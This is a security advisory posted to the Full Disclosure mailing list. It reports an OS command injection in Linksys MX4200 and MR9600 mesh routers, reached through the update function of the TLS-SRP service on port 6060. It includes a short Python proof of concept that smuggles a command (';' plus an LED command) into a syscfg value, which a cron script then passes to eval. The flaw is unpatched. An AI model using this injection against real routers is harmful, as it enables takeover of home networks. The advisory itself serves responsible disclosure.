Full Disclosure mailing list archives

Advisory ID:               SYSS-2025-011
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys

Tested Version(s):         1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type:        OS Command Injection (CWE-78)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to missing neutralization of special elements, OS commands can
be injected via the update functionality of a TLS-SRP connection,
which is normally used for configuring devices inside the mesh
network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides a service (sct_server
binary) running on TCP port 6060, which is used to integrate other mesh
devices into the network. The service accepts TLS-SRP connections with
a username and password.

The service supports an update request, which can be used to set
"syscfg" variables on the device. The script
"/tmp/cron/cron.everyminute/offline-notifier.cron" is executed every
minute and sets "syscfg" variables containing "node-off" as environment
variables using the following lines:

  VARS="$(syscfg show |
          grep node-off |
          sed -r "s/^[^:]+:://g" |
          while read i; do
              echo "$i;"
          done)"
  eval $VARS

Usually, the variable "VARS" is set to a value similar to the following:

  $ syscfg show | grep node-off

  node-off::min_offline_time=3
  node-off::enabled=1
  node-off::cache_dir=/tmp/msg
  node-off::enable_cloud=1
  node-off::debug=0

By using the service on port 6060, an update request can be sent to the
device, which can be used to set an arbitrary "syscfg" entry. If this
entry contains ";", OS commands can be injected into the "VARS"
variable, which will be used by eval.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the "tlslite-ng" library, the following Python code will result
in the LED indicator at the top of the device turning yellow, indicating
that the OS command got successfully executed:

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.connect(("192.168.1.1", 6060))

  conn = TLSConnection(sock)
  conn.handshakeClientSRP(srp_username, srp_pass)

conn.sendall(bytes.fromhex("4f53435479e0b43120fcf435000000600000"))

This code results in the following "syscfg" value to be set:

  $ syscfg show | grep SySS
  node-off::SySS=; combo_solid yellow on

When parsed by the script "offline-notifier.cron", the following line
will be executed by eval, resulting in the indicator LED turning yellow
after a maximum of 60 seconds:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-011
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-011.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske () syss de

Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

Attachment: OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• [SYSS-2025-011] Linksys MX9600/MX4200 - OS Command Injection Christian Zäske via Fulldisclosure (Feb 16)